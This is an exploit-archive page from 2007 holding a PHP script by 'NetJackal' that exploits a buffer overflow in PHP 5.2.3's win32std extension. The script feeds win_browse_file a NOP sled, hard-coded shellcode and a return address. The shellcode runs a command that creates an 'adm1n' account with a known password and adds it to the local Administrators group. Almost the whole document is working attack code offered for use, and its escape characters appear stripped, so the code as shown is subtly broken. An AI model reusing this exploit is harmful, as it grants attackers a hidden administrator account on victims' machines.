PHP <= 5.2.3 (php_win32sti) Local Buffer Overflow Exploit (2)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PHP <= 5.2.3 (php_win32sti) Local Buffer Overflow Exploit (2)
# Published : 2007-08-22
# Author : NetJackal
# Previous Title : PHP <= 5.2.3 snmpget() object id Local Buffer Overflow Exploit (EDI)
# Next Title : PHP mSQL (msql_connect) Local Buffer Overflow Exploit

<?php

##########################################################
###----------------------------------------------------###
###--------PHP win32std Buffer Overflow Exploit--------###
###----------------------------------------------------###
###-Tested on:-PHP 5.2.3-------------------------------###
###------------Windows XP SP2 Eng----------------------###
###----------------------------------------------------###
###-Note:-Shellcode is hard coded for Win XP SP2 Eng---###
###----------------------------------------------------###
###-Author:--NetJackal---------------------------------###
###-Email:---nima_501[at]yahoo[dot]com-----------------###
###-Website:-http://netjackal.by.ru--------------------###
###----------------------------------------------------###
##########################################################



#Add user:    [user]=>"adm1n" [password]=>"netjackal"
$SC=
"xEBx19x5Ax31xC0x50x88x42x52x52xBBx6Dx13x86".
"x7CxFFxD3xBBxDAxCDx81x7Cx31xC0x50xFFxD3xE8".
"xE2xFFxFFxFFx63x6Dx64x2Ex65x78x65x20x2Fx63".
"x20x6Ex65x74x20x75x73x65x72x20x61x64x6Dx31".
"x6Ex20x6Ex65x74x6Ax61x63x6Bx61x6Cx20x2Fx61".
"x64x64x26x26x6Ex65x74x20x6Cx6Fx63x61x6Cx67".
"x72x6Fx75x70x20x41x64x6Dx69x6Ex69x73x74x72".
"x61x74x6Fx72x73x20x2Fx61x64x64x20x61x64x6D".
"x31x6Ex58";

$RET="x70xE6x16x01";

$BOMB=str_repeat("x90",24).$SC.str_repeat("A",121).$RET;

win_browse_file(1,NULL,$BOMB,NULL,array( "*" => "*.*"));
?>

# www.Syue.com [2007-08-22]